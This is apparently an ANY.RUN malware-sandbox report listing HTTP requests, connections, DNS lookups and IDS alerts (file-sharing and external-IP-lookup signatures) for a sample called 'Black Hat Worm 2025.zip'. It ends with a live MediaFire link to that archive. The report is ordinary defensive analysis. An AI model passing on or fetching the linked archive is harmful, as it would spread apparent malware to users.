http://e6.o.lencr.org/
unknown
whitelisted
5116
firefox.exe
POST
200
142.250.184.195:80
http://o.pki.goog/we2
unknown
whitelisted
POST
200
142.250.184.195:80
http://o.pki.goog/s/we1/sY8
unknown
whitelisted
5116
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
whitelisted
5116
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5116
firefox.exe
34.107.221.82:80
detectportal.firefox.com
GOOGLE
US
whitelisted
5116
firefox.exe
104.17.150.117:443
www.mediafire.com
CLOUDFLARENET
whitelisted
5116
firefox.exe
34.160.144.191:443
content-signature-2.cdn.mozilla.net
GOOGLE
US
whitelisted
34.36.137.203:443
contile.services.mozilla.com
whitelisted
216.58.206.74:443
safebrowsing.googleapis.com
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
google.com
  • 142.250.185.174
  • 142.250.185.206
whitelisted
www.mediafire.com
  • 104.17.150.117
  • 104.17.151.117
whitelisted
detectportal.firefox.com
  • 34.107.221.82
whitelisted
prod.detectportal.prod.cloudops.mozgcp.net
  • 34.107.221.82
  • 2600:1901:0:38d7::
whitelisted
content-signature-2.cdn.mozilla.net
  • 34.160.144.191
whitelisted
prod.content-signature-chains.prod.webservices.mozgcp.net
  • 34.160.144.191
  • 2600:1901:0:92a9::
whitelisted
example.org
  • 23.215.0.132
  • 23.215.0.133
  • 96.7.128.192
  • 96.7.128.186
whitelisted
ipv4only.arpa
  • 192.0.0.170
  • 192.0.0.171
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Requests to a free CDN for open source projects (jsdelivr .net)
2196
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
2196
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
2196
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
3240
svchost.exe
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://www.mediafire.com/file/qslvw7hg7v7k41d/Black+Hat+Worm+2025.zip/file